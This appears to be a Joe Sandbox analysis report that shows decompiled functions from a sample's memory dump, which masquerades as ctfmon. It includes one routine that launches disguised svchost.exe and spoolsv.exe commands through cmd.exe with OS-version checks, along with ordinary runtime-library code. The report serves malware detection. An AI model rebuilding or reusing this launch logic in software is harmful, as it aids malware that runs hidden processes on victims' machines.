                                                Function 00967720 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 185sleepsynchronizationthreadCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 86%
                                                			E00967720(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _v8;
				char _v268;
				char _v528;
				char _v788;
				char _v1048;
				char _v1308;
				char _v1568;
				signed int _t26;
				signed int _t56;
				signed int _t65;
				void* _t77;
				void* _t99;
				void** _t101;
				void* _t102;
				void* _t103;
				void* _t104;
				signed int _t105;
				void* _t106;
				void* _t109;
				void* _t110;
				void* _t111;
				void* _t112;

				_t100 = __esi;
				_t26 =  *0x98f008; // 0x35554c2f
				_v8 = _t26 ^ _t105;
				_t99 = __edx;
				_t77 = __ecx;
				E00973440(__edx,  &_v1048, 0, 0x104);
				GetSystemDirectoryA( &_v1048, 0x104);
				E00973440(_t99,  &_v268, 0, 0x104);
				E00973440(_t99,  &_v788, 0, 0x104);
				E00973440(_t99,  &_v1308, 0, 0x104);
				E00973440(_t99,  &_v1568, 0, 0x104);
				E00973440(_t99,  &_v528, 0, 0x104);
				E00965180( &_v268, 0x104, "%s\\process1.txt", _t99);
				E00965180( &_v788, 0x104, "%s\\process2.txt", _t99);
				_push( &_v268);
				E00965180( &_v1308, 0x104, "/c %s\\svchost.exe > %s", _t99);
				_push( &_v788);
				E00965180( &_v1568, 0x104, "/c %s\\spoolsv.exe > %s", _t99);
				E00965180( &_v528, 0x104, "%s\\cmd.exe",  &_v1048);
				_t109 = _t106 + 0xa0;
				if(E009671E0(_t99, _t99) != 0) {
					_t56 = E009672D0(_t77, _t99, _t77, _t99, "WIN72K8R2");
					_t110 = _t109 + 4;
					__eflags = _t56;
					if(__eflags == 0) {
						goto L1;
					} else {
						_push(__esi);
						while(1) {
							_t101 = E00964F50( &_v528,  &_v1308, __eflags, _t99);
							_t111 = _t110 + 4;
							__eflags = _t101;
							if(_t101 == 0) {
								break;
							}
							WaitForSingleObject( *_t101, 0x2bf20);
							_push(0x10);
							E00970AA1(_t101);
							_t112 = _t111 + 8;
							_t65 = E009675E0( &_v268);
							__eflags = _t65;
							if(_t65 != 0) {
								__eflags = _t65 == 1;
								if(_t65 == 1) {
									break;
								} else {
									__eflags = E009673E0(_t77,  &_v268, _t99, _t99, _t101, _t77);
									if(__eflags == 0) {
										break;
									} else {
										__eflags = E00964FD0( &_v1568, __eflags, _t99);
										if(__eflags == 0) {
											break;
										} else {
											_t103 = E00970AB4(_t101, __eflags);
											E00973440(_t99, _t103, 0, 0x80);
											E00975C70(_t103, 0x80, _t77);
											CreateThread(0, 0, E00967980, _t103, 0, 0);
											Sleep(0x32);
											_t104 = 0x80;
											__eflags = _v8 ^ _t105;
											return E00970A5D(_v8 ^ _t105, _t104);
										}
									}
								}
							} else {
								E009672D0(_t77, _t99, _t77, _t99, "XP");
								_t110 = _t112 + 4;
								continue;
							}
							goto L12;
						}
						_pop(_t102);
						__eflags = _v8 ^ _t105;
						return E00970A5D(_v8 ^ _t105, _t102);
					}
				} else {
					L1:
					return E00970A5D(_v8 ^ _t105, _t100);
				}
				L12:
			}

























                                                0x00967720
                                                0x00967729
                                                0x00967730
                                                0x00967740
                                                0x00967745
                                                0x00967747
                                                0x0096775b
                                                0x0096776f
                                                0x00967782
                                                0x00967795
                                                0x009677a8
                                                0x009677bb
                                                0x009677d2
                                                0x009677ec
                                                0x009677f7
                                                0x0096780a
                                                0x00967815
                                                0x00967828
                                                0x00967845
                                                0x0096784a
                                                0x00967856
                                                0x00967873
                                                0x00967878
                                                0x0096787b
                                                0x0096787d
                                                0x00000000
                                                0x0096787f
                                                0x0096787f
                                                0x00967880
                                                0x00967892
                                                0x00967894
                                                0x00967897
                                                0x00967899
                                                0x00000000
                                                0x00000000
                                                0x009678a6
                                                0x009678ac
                                                0x009678af
                                                0x009678b4
                                                0x009678c2
                                                0x009678c2
                                                0x009678c5
                                                0x009678da
                                                0x009678dd
                                                0x00000000
                                                0x009678e3
                                                0x009678f4
                                                0x009678f6
                                                0x00000000
                                                0x009678f8
                                                0x0096790d
                                                0x0096790f
                                                0x00000000
                                                0x00967911
                                                0x00967920
                                                0x00967925
                                                0x00967931
                                                0x00967947
                                                0x0096794f
                                                0x00967955
                                                0x0096795d
                                                0x00967967
                                                0x00967967
                                                0x0096790f
                                                0x009678f6
                                                0x009678c7
                                                0x009678d0
                                                0x009678d5
                                                0x00000000
                                                0x009678d5
                                                0x00000000
                                                0x009678c5
                                                0x0096796d
                                                0x0096796f
                                                0x0096797a
                                                0x0096797a
                                                0x00967859
                                                0x00967859
                                                0x00967869
                                                0x00967869
                                                0x00000000

                                                APIs
                                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0096775B
                                                • WaitForSingleObject.KERNEL32(00000000,0002BF20,00000000), ref: 009678A6
                                                • CreateThread.KERNEL32(00000000,00000000,00967980,00000000,00000000,00000000), ref: 00967947
                                                • Sleep.KERNEL32(00000032), ref: 0096794F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: CreateDirectoryObjectSingleSleepSystemThreadWait
                                                • String ID: %s\cmd.exe$%s\process1.txt$%s\process2.txt$/LU5/$/c %s\spoolsv.exe > %s$/c %s\svchost.exe > %s$WIN72K8R2
                                                • API String ID: 3526521245-1752958003
                                                • Opcode ID: aee249bc24ac1ffbb0878d388c71cdec1231b431972ce9e3c8d903e184b6eb80
                                                • Instruction ID: 0772d7b9cc4c91198275ce41e6424a9280bb9a9a556738e4d90610311288465b
                                                • Opcode Fuzzy Hash: aee249bc24ac1ffbb0878d388c71cdec1231b431972ce9e3c8d903e184b6eb80
                                                • Instruction Fuzzy Hash: 5151EBF2A4430C77DB24EBA09C47FDEB36C9BC5708F5040A5F64CA61C2DAB09B898751
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0097FB76 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                Download Yara Rule
                                                C-Code - Quality: 41%
                                                			E0097FB76(void* __ecx, intOrPtr* _a4, signed int* _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v5;
				char _v6;
				void* _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v36;
				signed int _v44;
				void _v48;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t114;
				signed int _t123;
				signed char _t124;
				signed int _t134;
				intOrPtr _t164;
				intOrPtr _t180;
				signed int* _t190;
				signed int _t192;
				char _t197;
				signed int _t203;
				signed int _t206;
				signed int _t215;
				signed int _t217;
				signed int _t219;
				signed int _t225;
				signed int _t227;
				signed int _t234;
				signed int _t235;
				signed int _t237;
				signed int _t239;
				signed char _t242;
				intOrPtr _t245;
				void* _t248;
				void* _t252;
				void* _t262;
				signed int _t263;
				signed int _t266;
				signed int _t269;
				signed int _t270;
				void* _t272;
				void* _t274;
				void* _t275;
				void* _t277;
				void* _t278;
				void* _t280;
				void* _t284;

				_t262 = E0097F8D9(__ecx,  &_v72, _a16, _a20, _a24);
				_t192 = 6;
				memcpy( &_v48, _t262, _t192 << 2);
				_t274 = _t272 + 0x1c;
				_t248 = _t262 + _t192 + _t192;
				_t263 = _t262 | 0xffffffff;
				if(_v36 != _t263) {
					_t114 = E0097BF6B(_t248, _t263, __eflags);
					_t190 = _a8;
					 *_t190 = _t114;
					__eflags = _t114 - _t263;
					if(_t114 != _t263) {
						_v20 = _v20 & 0x00000000;
						_v24 = 0xc;
						_t275 = _t274 - 0x18;
						 *_a4 = 1;
						_push(6);
						_v16 =  !(_a16 >> 7) & 1;
						_push( &_v24);
						_push(_a12);
						memcpy(_t275,  &_v48, 1 << 2);
						_t197 = 0;
						_t252 = E0097F844();
						_t277 = _t275 + 0x2c;
						_v12 = _t252;
						__eflags = _t252 - 0xffffffff;
						if(_t252 != 0xffffffff) {
							L11:
							_t123 = GetFileType(_t252);
							__eflags = _t123;
							if(_t123 != 0) {
								__eflags = _t123 - 2;
								if(_t123 != 2) {
									__eflags = _t123 - 3;
									_t124 = _v48;
									if(_t123 == 3) {
										_t124 = _t124 | 0x00000008;
										__eflags = _t124;
									}
								} else {
									_t124 = _v48 | 0x00000040;
								}
								_v5 = _t124;
								E0097BEB4(_t197,  *_t190, _t252);
								_t242 = _v5 | 0x00000001;
								_v5 = _t242;
								_v48 = _t242;
								 *( *((intOrPtr*)(0x996480 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) = _t242;
								_t203 =  *_t190;
								_t205 = (_t203 & 0x0000003f) * 0x30;
								__eflags = _a16 & 0x00000002;
								 *((char*)( *((intOrPtr*)(0x996480 + (_t203 >> 6) * 4)) + 0x29 + (_t203 & 0x0000003f) * 0x30)) = 0;
								if((_a16 & 0x00000002) == 0) {
									L20:
									_v6 = 0;
									_push( &_v6);
									_push(_a16);
									_t278 = _t277 - 0x18;
									_t206 = 6;
									_push( *_t190);
									memcpy(_t278,  &_v48, _t206 << 2);
									_t134 = E0097F5F7(_t190,  &_v48 + _t206 + _t206,  &_v48);
									_t280 = _t278 + 0x30;
									__eflags = _t134;
									if(__eflags == 0) {
										 *((char*)( *((intOrPtr*)(0x996480 + ( *_t190 >> 6) * 4)) + 0x29 + ( *_t190 & 0x0000003f) * 0x30)) = _v6;
										 *( *((intOrPtr*)(0x996480 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x996480 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30) ^ (_a16 >> 0x00000010 ^  *( *((intOrPtr*)(0x996480 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30)) & 0x00000001;
										__eflags = _v5 & 0x00000048;
										if((_v5 & 0x00000048) == 0) {
											__eflags = _a16 & 0x00000008;
											if((_a16 & 0x00000008) != 0) {
												_t225 =  *_t190;
												_t227 = (_t225 & 0x0000003f) * 0x30;
												_t164 =  *((intOrPtr*)(0x996480 + (_t225 >> 6) * 4));
												_t87 = _t164 + _t227 + 0x28;
												 *_t87 =  *(_t164 + _t227 + 0x28) | 0x00000020;
												__eflags =  *_t87;
											}
										}
										_t266 = _v44;
										__eflags = (_t266 & 0xc0000000) - 0xc0000000;
										if((_t266 & 0xc0000000) != 0xc0000000) {
											L31:
											__eflags = 0;
											return 0;
										} else {
											__eflags = _a16 & 0x00000001;
											if((_a16 & 0x00000001) == 0) {
												goto L31;
											}
											CloseHandle(_v12);
											_v44 = _t266 & 0x7fffffff;
											_t215 = 6;
											_push( &_v24);
											_push(_a12);
											memcpy(_t280 - 0x18,  &_v48, _t215 << 2);
											_t245 = E0097F844();
											__eflags = _t245 - 0xffffffff;
											if(_t245 != 0xffffffff) {
												_t217 =  *_t190;
												_t219 = (_t217 & 0x0000003f) * 0x30;
												__eflags = _t219;
												 *((intOrPtr*)( *((intOrPtr*)(0x996480 + (_t217 >> 6) * 4)) + _t219 + 0x18)) = _t245;
												goto L31;
											}
											E00975D0D(GetLastError());
											 *( *((intOrPtr*)(0x996480 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x996480 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) & 0x000000fe;
											E0097C07D( *_t190);
											L10:
											goto L2;
										}
									}
									_t269 = _t134;
									goto L22;
								} else {
									_t269 = E0097FA55(_t205,  *_t190);
									__eflags = _t269;
									if(__eflags != 0) {
										L22:
										E0097A32C(__eflags,  *_t190);
										return _t269;
									}
									goto L20;
								}
							}
							_t270 = GetLastError();
							E00975D0D(_t270);
							 *( *((intOrPtr*)(0x996480 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x996480 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) & 0x000000fe;
							CloseHandle(_t252);
							__eflags = _t270;
							if(_t270 == 0) {
								 *((intOrPtr*)(E00975D43())) = 0xd;
							}
							goto L2;
						}
						_t234 = _v44;
						__eflags = (_t234 & 0xc0000000) - 0xc0000000;
						if((_t234 & 0xc0000000) != 0xc0000000) {
							L9:
							_t235 =  *_t190;
							_t237 = (_t235 & 0x0000003f) * 0x30;
							_t180 =  *((intOrPtr*)(0x996480 + (_t235 >> 6) * 4));
							_t33 = _t180 + _t237 + 0x28;
							 *_t33 =  *(_t180 + _t237 + 0x28) & 0x000000fe;
							__eflags =  *_t33;
							E00975D0D(GetLastError());
							goto L10;
						}
						__eflags = _a16 & 0x00000001;
						if((_a16 & 0x00000001) == 0) {
							goto L9;
						}
						_t284 = _t277 - 0x18;
						_v44 = _t234 & 0x7fffffff;
						_t239 = 6;
						_push( &_v24);
						_push(_a12);
						memcpy(_t284,  &_v48, _t239 << 2);
						_t197 = 0;
						_t252 = E0097F844();
						_t277 = _t284 + 0x2c;
						_v12 = _t252;
						__eflags = _t252 - 0xffffffff;
						if(_t252 != 0xffffffff) {
							goto L11;
						}
						goto L9;
					} else {
						 *(E00975D30()) =  *_t186 & 0x00000000;
						 *_t190 = _t263;
						 *((intOrPtr*)(E00975D43())) = 0x18;
						goto L2;
					}
				} else {
					 *(E00975D30()) =  *_t188 & 0x00000000;
					 *_a8 = _t263;
					L2:
					return  *((intOrPtr*)(E00975D43()));
				}
			}





















































                                                0x0097fb99
                                                0x0097fb9d
                                                0x0097fb9e
                                                0x0097fb9e
                                                0x0097fb9e
                                                0x0097fba0
                                                0x0097fba6
                                                0x0097fbc1
                                                0x0097fbc6
                                                0x0097fbc9
                                                0x0097fbcb
                                                0x0097fbcd
                                                0x0097fbec
                                                0x0097fbf3
                                                0x0097fbfa
                                                0x0097fbfd
                                                0x0097fc09
                                                0x0097fc0c
                                                0x0097fc14
                                                0x0097fc15
                                                0x0097fc18
                                                0x0097fc18
                                                0x0097fc1f
                                                0x0097fc21
                                                0x0097fc24
                                                0x0097fc2c
                                                0x0097fc2f
                                                0x0097fc9c
                                                0x0097fc9d
                                                0x0097fca3
                                                0x0097fca5
                                                0x0097fcee
                                                0x0097fcf1
                                                0x0097fcfa
                                                0x0097fcfd
                                                0x0097fd00
                                                0x0097fd02
                                                0x0097fd02
                                                0x0097fd02
                                                0x0097fcf3
                                                0x0097fcf6
                                                0x0097fcf6
                                                0x0097fd07
                                                0x0097fd0a
                                                0x0097fd16
                                                0x0097fd1b
                                                0x0097fd27
                                                0x0097fd31
                                                0x0097fd35
                                                0x0097fd3f
                                                0x0097fd42
                                                0x0097fd4d
                                                0x0097fd52
                                                0x0097fd62
                                                0x0097fd65
                                                0x0097fd69
                                                0x0097fd6a
                                                0x0097fd70
                                                0x0097fd75
                                                0x0097fd78
                                                0x0097fd7a
                                                0x0097fd7c
                                                0x0097fd81
                                                0x0097fd84
                                                0x0097fd86
                                                0x0097fdb0
                                                0x0097fdd4
                                                0x0097fdd8
                                                0x0097fddc
                                                0x0097fdde
                                                0x0097fde2
                                                0x0097fde4
                                                0x0097fdee
                                                0x0097fdf1
                                                0x0097fdf8
                                                0x0097fdf8
                                                0x0097fdf8
                                                0x0097fdf8
                                                0x0097fde2
                                                0x0097fdfd
                                                0x0097fe09
                                                0x0097fe0b
                                                0x0097fe96
                                                0x0097fe96
                                                0x00000000
                                                0x0097fe11
                                                0x0097fe11
                                                0x0097fe15
                                                0x00000000
                                                0x00000000
                                                0x0097fe1a
                                                0x0097fe2c
                                                0x0097fe34
                                                0x0097fe37
                                                0x0097fe38
                                                0x0097fe3b
                                                0x0097fe42
                                                0x0097fe47
                                                0x0097fe4a
                                                0x0097fe7e
                                                0x0097fe88
                                                0x0097fe88
                                                0x0097fe92
                                                0x00000000
                                                0x0097fe92
                                                0x0097fe53
                                                0x0097fe6c
                                                0x0097fe73
                                                0x0097fc96
                                                0x00000000
                                                0x0097fc96
                                                0x0097fe0b
                                                0x0097fd88
                                                0x00000000
                                                0x0097fd54
                                                0x0097fd5b
                                                0x0097fd5e
                                                0x0097fd60
                                                0x0097fd8a
                                                0x0097fd8c
                                                0x00000000
                                                0x0097fd92
                                                0x00000000
                                                0x0097fd60
                                                0x0097fd52
                                                0x0097fcad
                                                0x0097fcb0
                                                0x0097fccb
                                                0x0097fcd0
                                                0x0097fcd6
                                                0x0097fcd8
                                                0x0097fce3
                                                0x0097fce3
                                                0x00000000
                                                0x0097fcd8
                                                0x0097fc31
                                                0x0097fc38
                                                0x0097fc3a
                                                0x0097fc71
                                                0x0097fc71
                                                0x0097fc7b
                                                0x0097fc7e
                                                0x0097fc85
                                                0x0097fc85
                                                0x0097fc85
                                                0x0097fc91
                                                0x00000000
                                                0x0097fc91
                                                0x0097fc3c
                                                0x0097fc40
                                                0x00000000
                                                0x00000000
                                                0x0097fc42
                                                0x0097fc51
                                                0x0097fc56
                                                0x0097fc59
                                                0x0097fc5a
                                                0x0097fc5d
                                                0x0097fc5d
                                                0x0097fc64
                                                0x0097fc66
                                                0x0097fc69
                                                0x0097fc6c
                                                0x0097fc6f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0097fbcf
                                                0x0097fbd4
                                                0x0097fbd7
                                                0x0097fbde
                                                0x00000000
                                                0x0097fbde
                                                0x0097fba8
                                                0x0097fbad
                                                0x0097fbb3
                                                0x0097fbb5
                                                0x00000000
                                                0x0097fbba

                                                APIs
                                                  • Part of subcall function 0097F844: CreateFileW.KERNEL32(00000000,00000000,?,0097FC1F,?,?,00000000,?,0097FC1F,00000000,0000000C), ref: 0097F861
                                                • GetLastError.KERNEL32 ref: 0097FC8A
                                                • __dosmaperr.LIBCMT ref: 0097FC91
                                                • GetFileType.KERNEL32(00000000), ref: 0097FC9D
                                                • GetLastError.KERNEL32 ref: 0097FCA7
                                                • __dosmaperr.LIBCMT ref: 0097FCB0
                                                • CloseHandle.KERNEL32(00000000), ref: 0097FCD0
                                                • CloseHandle.KERNEL32(?), ref: 0097FE1A
                                                • GetLastError.KERNEL32 ref: 0097FE4C
                                                • __dosmaperr.LIBCMT ref: 0097FE53
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                • String ID: H
                                                • API String ID: 4237864984-2852464175
                                                • Opcode ID: cfae9ffd9055188542784bd4ae28beb8ea24abdd01832adc13cf00fa08d95499
                                                • Instruction ID: 1ab9ce4df0f30ac34a09128037f427db8ae8d7d7163b2ece860b245ed49e7071
                                                • Opcode Fuzzy Hash: cfae9ffd9055188542784bd4ae28beb8ea24abdd01832adc13cf00fa08d95499
                                                • Instruction Fuzzy Hash: 16A14633A241488FDF19DF68D865BAD3BA4AB46324F148169E819EF3E1D7348D02DB52
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00981A09 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 268COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 83%
                                                			E00981A09(void* __ebx, void* __edi, int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, short* _a20, char* _a24, int _a28, int _a32) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				short* _v32;
				int _v36;
				char* _v40;
				int _v44;
				intOrPtr _v48;
				void* _v60;
				void* __esi;
				signed int _t63;
				int _t70;
				signed int _t72;
				short* _t73;
				signed int _t77;
				short* _t87;
				void* _t89;
				void* _t92;
				int _t99;
				short _t101;
				intOrPtr _t102;
				signed int _t112;
				char* _t114;
				char* _t115;
				void* _t120;
				void* _t121;
				intOrPtr _t122;
				intOrPtr _t123;
				intOrPtr* _t125;
				short* _t126;
				short* _t127;
				signed int _t128;
				short* _t129;

				_t63 =  *0x98f008; // 0x35554c2f
				_v8 = _t63 ^ _t128;
				_t127 = _a20;
				_v44 = _a4;
				_v48 = _a8;
				_t67 = _a24;
				_v40 = _a24;
				_t125 = _a16;
				_v36 = _t125;
				if(_t127 <= 0) {
					if(_t127 >= 0xffffffff) {
						goto L2;
					} else {
						goto L5;
					}
				} else {
					_t127 = E0098002B(_t125, _t127);
					_t67 = _v40;
					L2:
					_t99 = _a28;
					if(_t99 <= 0) {
						if(_t99 < 0xffffffff) {
							goto L5;
						} else {
							goto L7;
						}
					} else {
						_t99 = E0098002B(_t67, _t99);
						L7:
						_t70 = _a32;
						if(_t70 == 0) {
							_t70 =  *( *_v44 + 8);
							_a32 = _t70;
						}
						if(_t127 == 0 || _t99 == 0) {
							if(_t127 != _t99) {
								if(_t99 <= 1) {
									if(_t127 <= 1) {
										if(GetCPInfo(_t70,  &_v28) == 0) {
											goto L5;
										} else {
											if(_t127 <= 0) {
												if(_t99 <= 0) {
													goto L36;
												} else {
													_t89 = 2;
													if(_v28 >= _t89) {
														_t114 =  &_v22;
														if(_v22 != 0) {
															_t127 = _v40;
															while(1) {
																_t122 =  *((intOrPtr*)(_t114 + 1));
																if(_t122 == 0) {
																	goto L15;
																}
																_t101 =  *_t127;
																if(_t101 <  *_t114 || _t101 > _t122) {
																	_t114 = _t114 + _t89;
																	if( *_t114 != 0) {
																		continue;
																	} else {
																		goto L15;
																	}
																}
																goto L63;
															}
														}
													}
													goto L15;
												}
											} else {
												_t92 = 2;
												if(_v28 >= _t92) {
													_t115 =  &_v22;
													if(_v22 != 0) {
														while(1) {
															_t123 =  *((intOrPtr*)(_t115 + 1));
															if(_t123 == 0) {
																goto L17;
															}
															_t102 =  *_t125;
															if(_t102 <  *_t115 || _t102 > _t123) {
																_t115 = _t115 + _t92;
																if( *_t115 != 0) {
																	continue;
																} else {
																	goto L17;
																}
															}
															goto L63;
														}
													}
												}
												goto L17;
											}
										}
									} else {
										L17:
										_push(3);
										goto L13;
									}
								} else {
									L15:
								}
							} else {
								_push(2);
								L13:
							}
						} else {
							L36:
							_t126 = 0;
							_t72 = MultiByteToWideChar(_a32, 9, _v36, _t127, 0, 0);
							_v44 = _t72;
							if(_t72 == 0) {
								L5:
							} else {
								_t120 = _t72 + _t72;
								asm("sbb eax, eax");
								if((_t120 + 0x00000008 & _t72) == 0) {
									_t73 = 0;
									_v32 = 0;
									goto L45;
								} else {
									asm("sbb eax, eax");
									_t85 = _t72 & _t120 + 0x00000008;
									_t112 = _t120 + 8;
									if((_t72 & _t120 + 0x00000008) > 0x400) {
										asm("sbb eax, eax");
										_t87 = E00977882(_t112, _t85 & _t112);
										_v32 = _t87;
										if(_t87 == 0) {
											goto L61;
										} else {
											 *_t87 = 0xdddd;
											goto L43;
										}
									} else {
										asm("sbb eax, eax");
										E00983C70();
										_t87 = _t129;
										_v32 = _t87;
										if(_t87 == 0) {
											L61:
											_t100 = _v32;
										} else {
											 *_t87 = 0xcccc;
											L43:
											_t73 =  &(_t87[4]);
											_v32 = _t73;
											L45:
											if(_t73 == 0) {
												goto L61;
											} else {
												_t127 = _a32;
												if(MultiByteToWideChar(_t127, 1, _v36, _t127, _t73, _v44) == 0) {
													goto L61;
												} else {
													_t77 = MultiByteToWideChar(_t127, 9, _v40, _t99, _t126, _t126);
													_v36 = _t77;
													if(_t77 == 0) {
														goto L61;
													} else {
														_t121 = _t77 + _t77;
														_t108 = _t121 + 8;
														asm("sbb eax, eax");
														if((_t121 + 0x00000008 & _t77) == 0) {
															_t127 = _t126;
															goto L56;
														} else {
															asm("sbb eax, eax");
															_t81 = _t77 & _t121 + 0x00000008;
															_t108 = _t121 + 8;
															if((_t77 & _t121 + 0x00000008) > 0x400) {
																asm("sbb eax, eax");
																_t127 = E00977882(_t108, _t81 & _t108);
																_pop(_t108);
																if(_t127 == 0) {
																	goto L59;
																} else {
																	 *_t127 = 0xdddd;
																	goto L54;
																}
															} else {
																asm("sbb eax, eax");
																E00983C70();
																_t127 = _t129;
																if(_t127 == 0) {
																	L59:
																	_t100 = _v32;
																} else {
																	 *_t127 = 0xcccc;
																	L54:
																	_t127 =  &(_t127[4]);
																	L56:
																	if(_t127 == 0 || MultiByteToWideChar(_a32, 1, _v40, _t99, _t127, _v36) == 0) {
																		goto L59;
																	} else {
																		_t100 = _v32;
																		_t126 = E00977DA7(_t108, _v48, _a12, _v32, _v44, _t127, _v36, _t126, _t126, _t126);
																	}
																}
															}
														}
														E0097A677(_t127);
													}
												}
											}
										}
									}
								}
								E0097A677(_t100);
							}
						}
					}
				}
				L63:
				return E00970A5D(_v8 ^ _t128, _t127);
			}




































                                                0x00981a11
                                                0x00981a18
                                                0x00981a20
                                                0x00981a23
                                                0x00981a29
                                                0x00981a2c
                                                0x00981a2f
                                                0x00981a33
                                                0x00981a36
                                                0x00981a3b
                                                0x00981a62
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00981a3d
                                                0x00981a45
                                                0x00981a47
                                                0x00981a4b
                                                0x00981a4b
                                                0x00981a50
                                                0x00981a6e
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00981a52
                                                0x00981a5b
                                                0x00981a70
                                                0x00981a70
                                                0x00981a75
                                                0x00981a7c
                                                0x00981a7f
                                                0x00981a7f
                                                0x00981a84
                                                0x00981a90
                                                0x00981a9d
                                                0x00981aaa
                                                0x00981abd
                                                0x00000000
                                                0x00981abf
                                                0x00981ac1
                                                0x00981af4
                                                0x00000000
                                                0x00981af6
                                                0x00981af8
                                                0x00981afc
                                                0x00981b02
                                                0x00981b05
                                                0x00981b07
                                                0x00981b0a
                                                0x00981b0a
                                                0x00981b0f
                                                0x00000000
                                                0x00000000
                                                0x00981b11
                                                0x00981b15
                                                0x00981b1f
                                                0x00981b24
                                                0x00000000
                                                0x00981b26
                                                0x00000000
                                                0x00981b26
                                                0x00981b24
                                                0x00000000
                                                0x00981b15
                                                0x00981b0a
                                                0x00981b05
                                                0x00000000
                                                0x00981afc
                                                0x00981ac3
                                                0x00981ac5
                                                0x00981ac9
                                                0x00981acf
                                                0x00981ad2
                                                0x00981ad4
                                                0x00981ad4
                                                0x00981ad9
                                                0x00000000
                                                0x00000000
                                                0x00981adb
                                                0x00981adf
                                                0x00981ae9
                                                0x00981aee
                                                0x00000000
                                                0x00981af0
                                                0x00000000
                                                0x00981af0
                                                0x00981aee
                                                0x00000000
                                                0x00981adf
                                                0x00981ad4
                                                0x00981ad2
                                                0x00000000
                                                0x00981ac9
                                                0x00981ac1
                                                0x00981aac
                                                0x00981aac
                                                0x00981aac
                                                0x00000000
                                                0x00981aac
                                                0x00981a9f
                                                0x00981a9f
                                                0x00981aa1
                                                0x00981a92
                                                0x00981a92
                                                0x00981a94
                                                0x00981a94
                                                0x00981b2b
                                                0x00981b2b
                                                0x00981b2b
                                                0x00981b38
                                                0x00981b3e
                                                0x00981b43
                                                0x00981a64
                                                0x00981b49
                                                0x00981b49
                                                0x00981b51
                                                0x00981b55
                                                0x00981bb0
                                                0x00981bb2
                                                0x00000000
                                                0x00981b57
                                                0x00981b5c
                                                0x00981b5e
                                                0x00981b60
                                                0x00981b68
                                                0x00981b8c
                                                0x00981b91
                                                0x00981b96
                                                0x00981b9c
                                                0x00000000
                                                0x00981ba2
                                                0x00981ba2
                                                0x00000000
                                                0x00981ba2
                                                0x00981b6a
                                                0x00981b6c
                                                0x00981b70
                                                0x00981b75
                                                0x00981b77
                                                0x00981b7c
                                                0x00981c91
                                                0x00981c91
                                                0x00981b82
                                                0x00981b82
                                                0x00981ba8
                                                0x00981ba8
                                                0x00981bab
                                                0x00981bb5
                                                0x00981bb7
                                                0x00000000
                                                0x00981bbd
                                                0x00981bc5
                                                0x00981bd3
                                                0x00000000
                                                0x00981bd9
                                                0x00981be2
                                                0x00981be8
                                                0x00981bed
                                                0x00000000
                                                0x00981bf3
                                                0x00981bf3
                                                0x00981bf6
                                                0x00981bfb
                                                0x00981bff
                                                0x00981c4b
                                                0x00000000
                                                0x00981c01
                                                0x00981c06
                                                0x00981c08
                                                0x00981c0a
                                                0x00981c12
                                                0x00981c2f
                                                0x00981c39
                                                0x00981c3b
                                                0x00981c3e
                                                0x00000000
                                                0x00981c40
                                                0x00981c40
                                                0x00000000
                                                0x00981c40
                                                0x00981c14
                                                0x00981c16
                                                0x00981c1a
                                                0x00981c1f
                                                0x00981c23
                                                0x00981c85
                                                0x00981c85
                                                0x00981c25
                                                0x00981c25
                                                0x00981c46
                                                0x00981c46
                                                0x00981c4d
                                                0x00981c4f
                                                0x00000000
                                                0x00981c68
                                                0x00981c68
                                                0x00981c81
                                                0x00981c81
                                                0x00981c4f
                                                0x00981c23
                                                0x00981c12
                                                0x00981c89
                                                0x00981c8e
                                                0x00981bed
                                                0x00981bd3
                                                0x00981bb7
                                                0x00981b7c
                                                0x00981b68
                                                0x00981c95
                                                0x00981c9b
                                                0x00981b43
                                                0x00981a84
                                                0x00981a50
                                                0x00981c9d
                                                0x00981cb0

                                                APIs
                                                • GetCPInfo.KERNEL32(?,?,?,7FFFFFFF,?,?,00981CE2,?,?,?,?,?,?,?,?,?), ref: 00981AB5
                                                • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000,?,00981CE2,?,?,?,?,?,?,?,?), ref: 00981B38
                                                • __alloca_probe_16.LIBCMT ref: 00981B70
